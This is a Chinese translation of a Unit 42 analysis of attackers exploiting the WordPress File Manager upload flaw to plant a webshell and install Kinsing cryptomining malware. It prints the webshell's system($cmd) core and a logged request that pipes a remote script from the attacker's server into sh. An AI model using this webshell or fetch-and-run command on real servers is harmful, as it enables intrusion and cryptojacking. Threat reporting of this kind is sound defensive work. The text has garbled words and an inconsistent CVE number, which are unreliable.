2020年12月,Unit42研究人员发现攻击者试图利用WordPress文件管理器插件中的文件上传漏洞。成功利用此漏洞的攻击者可以上传任意文件名和扩展名的任意文件,导致目标Web服务器远程执行代码。攻击者利用该漏洞安装了一个webshel??l,然后该webshel??l被用来安装Kinsing恶意软件,该恶意软件运行来自H2miner系列的恶意加密货币矿工。Kinsing是用Golang编程语言开发的,最终目标是用于容器环境中的加密劫持攻击。CVE-2020-2513和Webshel??lsCVE-2020-2513漏洞是由于WordPress文件管理器插件将elFinder库中的connector.minimal.php.dist文件的后缀名改为.php导致的,可以直接执行该文件。但由于该文件没有访问限制,任何浏览网络服务器的人都可以执行它。此文件包含无需身份验证即可将文件上传到Web服务器的机制。由于此漏洞,任何人都可以上传文件,因此恶意攻击者利用此机制上传webshel??l,可用于进一步的恶意软件安装或加密货币挖掘活动。攻击链研究人员在被攻击机器中发现了如下日志信息,其中向web服务器发送的HTTPPOST请求为:[19/Dec/2020:08:58:08+0000]"POST/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.phpHTTP/1.1"2001453"-""Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/78.0.3904.108Safari/537.36"该请求用于上传webshel??l。研究人员进一步分析发现了一个恶意webshel??l:[19/Dec/2020:08:57:48+0000]"GET/wp-content/plugins/wp-file-manager/lib/files/k.php?cmd=curl+X.X.X.X%2Fwpf.sh%7CshHTTP/1.1”200411从上图可以看出,webshel??l名为k.php,并提供了执行命令。webshel??l本身很简单,以明文形式保存在web服务器,并且不包含任何混淆和身份验证措施:";$cmd=($_REQUEST['cmd']);system($cmd);echo"";die;}?>研究人员进一步分析返回给webshel??lk.php的HTTPGET请求,发现该命令调用了下载名为wpf.sh和文件的curl命令执行该文件,研究人员从攻击者的C2服务器获取到shell脚本,文件内容如下:...wpf.sh文件是一个使用wget下载Kinsing的脚本,给出了脚本执行权限,并执行。综上所述,研究人员发现WordPress文件管理器远程代码执行漏洞CVE-2020-25213在野被利用。攻击者利用该漏洞安装Kinsing恶意软件并运行H2miner家族的恶意加密货币矿机。Kinsing的最终目标是将其用于容器环境中的加密货币劫持攻击。本文翻译自:https://unit42.paloaltonetworks.com/cve-2020-25213/如有转载请注明出处。
